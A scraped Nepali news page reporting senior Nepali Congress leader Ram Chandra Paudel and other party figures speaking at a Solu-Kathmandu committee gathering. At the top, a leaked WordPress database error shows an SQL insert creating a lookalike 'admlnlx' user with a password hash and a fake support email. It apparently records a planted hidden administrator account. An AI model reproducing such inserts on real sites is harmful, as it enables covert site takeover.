WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BYsE84Fy/.FLon7L2UkgrKg3e2k1kJ/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 22:35:45', '', 'admlnlx', 'admlnlx')

कांग्रेसलाई जनताको भरोसायोग्य पार्टी बनाउनु पर्नेमा वरिष्ठ नेता पौडेलको जोड – Gaule Khabar

कांग्रेसलाई जनताको भरोसायोग्य पार्टी बनाउनु पर्नेमा वरिष्ठ नेता पौडेलको जोड

कांग्रेसलाई जनताको भरोसायोग्य पार्टी बनाउनु पर्नेमा वरिष्ठ नेता पौडेलको जोड

नेपाली कांग्रेसका वरिष्ठ नेता रामचन्द्र पौडेलले नेपाली कांग्रेसलाई कसरी जनताको भरोसाको पार्टी बनाउने भन्ने चिन्ता रहेको बताउनु भएको छ ।

नेपाली कांग्रेस सोलु-काठमाण्डौ सम्पर्क समितिद्वारा राजधानीमा आयोजित कार्यक्रमलाई सम्बोधन गर्दै वरिष्ठ नेता पौडेलले सो कुरा बताउनुभएको हो। सुकेधारास्थित मिराकल पार्टी प्यालेसमा आयोजित कार्यक्रमलाई सम्बोधन गर्दै वरिष्ठ नेता पौडेलले कम्युनिस्टहरुको सिद्धान्तको टुङगो नभएको भन्दै कांग्रेसको नेतृत्वमा बनेको संबिधान केपी ओलीले च्यातेको आरोप लगाउनुभयो ।

कार्यक्रमलाई सम्बोधन गर्दै नेपाली कांग्रेसका केन्द्रीय सदस्य तथा पूर्वमन्त्री बलबहादुर केसीले कांग्रेस अहिले कांग्रेस बन्ने दिन आएको बताउंदै सत्तामा जान ओली र प्रचण्ड बन्न नहुने सुझाउनु भयो।नेकपाले कांग्रेस कहाँ छ भनेर खोज्ने दिन आएको बताउंदै केसीले गिरिजा प्रसाद कोईरालाले गणतन्त्र ल्याउन हस्ताक्षर नगरेको थियो भने नेपाल यो अवस्थामा नआउने बताउनु भयो ।

पुर्वमन्त्री केसीले ७७ वटै जिल्ला मध्यका सम्पर्क समिति मध्य सोलु -काठमाण्डौ सम्पर्क समिति एक नम्बरको समिति भएको बताउनु भयो।उहाले काठमाण्डौ तथा अन्य शहरमा बसेर क्रियाशिल नपाईने बताउनु भएको छ।कार्यक्रमलाई नेपाली कांग्रेसका केन्द्रिय सदस्य तथा पुर्वमन्त्री अम्बिका बस्नेत,नेपाली कांग्रेस सोलुखुम्बुका सभापति बिनोद कुमार बस्नेत,नेपाली कांग्रेस दोलखाका सभापति रुद्र खडका,महासमिति सदस्यहरु खिलराज बस्नेत नेपाली कांग्रेस सोलुखुम्बुका नेता प्रकाश सिंह कार्की, भोजराज कार्की,जयप्रसाद राई,शम्भुहरी बास्तोला,नेपाली कांग्रेस सोलुखुम्बुका सचिव भलाकाजी कुलुङ, सहसचिव कुशराज राई प्रवक्ता सन्तोष कटेल,नेपाल विद्यार्थी संघका पुर्व उपाध्यक्ष प्रमोद हरी गुमागाई,नेपाल तरुण दल सोलुखुम्बुका अध्यक्ष अशोक झा, किसान संघ सोलुखुम्बुका अध्यक्ष हुतराज बस्नेत नेपाल महिला संघका अध्यक्ष छिण्डील्हमु शेर्पा ,नेपाल विद्यार्थी संघ सोलुखुम्बुका सभापति अस्बिनबाबू थापा,नेपाली कांग्रेस सोलु-काठमाण्डौ सम्पर्क समितिका नेताहरु हेमराज कटेल, बिमला गुरुङ,नेपाल विद्यार्थी संघका नेता पुष्कर बास्तोला, भरत काफ्ले लगायतले सम्बोधन गरेका थिए ।

अधिकांश बक्ताहहरूले क्रियाशिल वितरण जिल्ला कार्य समितिले पाएकाले सबैलाई सम्मान गरि वितरण हुने आशा व्यक्त गरेका थिए। स्वर्गीय नेपाली कांग्रेसका नेता कृष्ण नेपालीको छोरी कमला नेपालीले कांगेलमा बन्ने विपी स्मृति भवनका लागि २० हजार एक सय आर्थिक सहयोग गरेको सम्पर्क समितिका सचिव टार्जन कुलुङले जानकारी दिनुभयो ।कार्यक्रममा नेकपा खुम्बु पासाङल्हामु गाउँपालिका सचिव राम कुमार तामाङसहित दर्जनौ विभिन्न पार्टी परित्याग गरि नेपाली कांग्रेसमा प्रवेश गरेका छन ।

नवप्रवेशीहरुलाई वरिष्ठ नेता पौडेल केन्द्रिय सदस्य बल बहादुर केसी लगायतका नेताले स्वागत गरेको सचिव कुलुङ्ले बताउनुभयो।वृहत कार्यकर्ता भेला कार्यक्रम गोकर्ण बस्नेतको सभापतित्वमा सम्पन्न भएको थियो । रहस्याखबर

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका